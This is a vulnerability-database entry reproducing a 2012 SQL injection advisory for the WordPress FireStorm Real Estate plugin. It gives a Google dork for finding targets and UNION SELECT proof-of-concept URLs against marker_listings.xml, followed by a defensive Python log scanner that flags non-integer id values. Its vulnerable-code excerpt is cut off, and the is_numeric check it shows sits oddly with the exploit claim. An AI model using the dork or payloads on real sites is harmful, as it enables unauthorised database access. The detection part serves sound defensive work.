WordPress FireStorm Real Estate 2.06.08 SQL Injection

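Vulnerability ID 1046103 Vulnerability type
Published 2012-11-21 Updated 2012-11-21
CVE ID N/A CNNVD-ID N/A
Platform N/A CVSS score N/A
|Source
https://cxsecurity.com/issue/WLB-2012110147
|Vulnerability details
Vulnerability details have not yet been disclosed
|Exploit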

Title                  => FireStorm Real Estate SQL Injection.
Date                  => 10/19/2012
Version              => 2.06.08
Vendor               => http://www.firestormplugins.com
Tested on          => Microsoft Windows 7, Linux BackBox.
Discovered by     => B00B5 [http://www.hackforums.net/member.php?action=profile&uid=1403300]
Download          => http://wordpress.org/extend/plugins/fs-real-estate-plugin/
Google Dork       => inurl:"/xml/marker_listings.xml?id" filetype:xml

Vulnerable Code => if (isset($_GET['id'])) {
                   if (is_numeric($_GET['id'])) {

                   $query = "SELECT * FROM ".$table_prefix."fsrep_listings WHERE listing_long != '' AND listing_lat != '' AND listing_id = ".$_GET['id'

PoC           => /wp-content/plugins/fs-real-estate-plugin/xml/marker_listings.xml?id=[SQL Query]
                => /wp-content/plugins/fs-real-estate-plugin/xml/marker_listings.xml?id=null UNION SELECT 1,2,3,4,version()--

Demo           => /wp-content/plugins/fs-real-estate-plugin/xml/marker_listings.xml?id=null UNION SELECT 1,2,3,4,5,6,7,8,version(),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31--
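
Detection sketch for the requests shown above, added here as an example and not part of the original advisory: it scans web server access logs for hits on marker_listings.xml whose id parameter is not a plain decimal integer. The combined log format, the function names and the sample log lines are assumptions; the log lines are constructed and use documentation addresses.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Endpoint named in the advisory's PoC.
ENDPOINT = "/wp-content/plugins/fs-real-estate-plugin/xml/marker_listings.xml"
# Client address, request target and status from a combined-format log line.
# The target is matched lazily so that unencoded spaces in it are still captured.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (.+?) HTTP/[\d.]+" (\d{3})')

def suspicious_ids(target):
    """Return the id values in a request target that are not plain decimal integers."""
    parts = urlsplit(target)
    if not parts.path.endswith(ENDPOINT):
        return []
    # parse_qs percent-decodes and maps '+' to a space, so encoded values are normalised.
    values = parse_qs(parts.query, keep_blank_values=True).get("id", [])
    return [v for v in values if not re.fullmatch(r"[0-9]{1,10}", v)]

def scan(lines):
    """Return a list of (client, status, bad_value) tuples, one per flagged id value."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line in the assumed format
        client, target, status = m.groups()
        for value in suspicious_ids(target):
            hits.append((client, int(status), value))
    return hits

# Constructed sample log lines, not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [21/Nov/2012:10:00:01 +0000] "GET /wp-content/plugins/fs-real-estate-plugin/xml/marker_listings.xml?id=42 HTTP/1.1" 200 812',
    '198.51.100.7 - - [21/Nov/2012:10:00:05 +0000] "GET /wp-content/plugins/fs-real-estate-plugin/xml/marker_listings.xml?id=null%20UNION%20SELECT%201,2,3,4,version()-- HTTP/1.1" 200 640',
    '198.51.100.7 - - [21/Nov/2012:10:00:09 +0000] "GET /wp-content/plugins/fs-real-estate-plugin/xml/marker_listings.xml?id=12abc HTTP/1.1" 200 0',
    '203.0.113.5 - - [21/Nov/2012:10:01:00 +0000] "GET /index.php?id=abc HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for client, status, value in scan(SAMPLE_LOG):
        print(f"{client} status={status} id={value!r}")
```

The same strict-integer rule can be enforced in front of the site (for example as a reverse-proxy or WAF rule on this path) until the plugin is updated or removed.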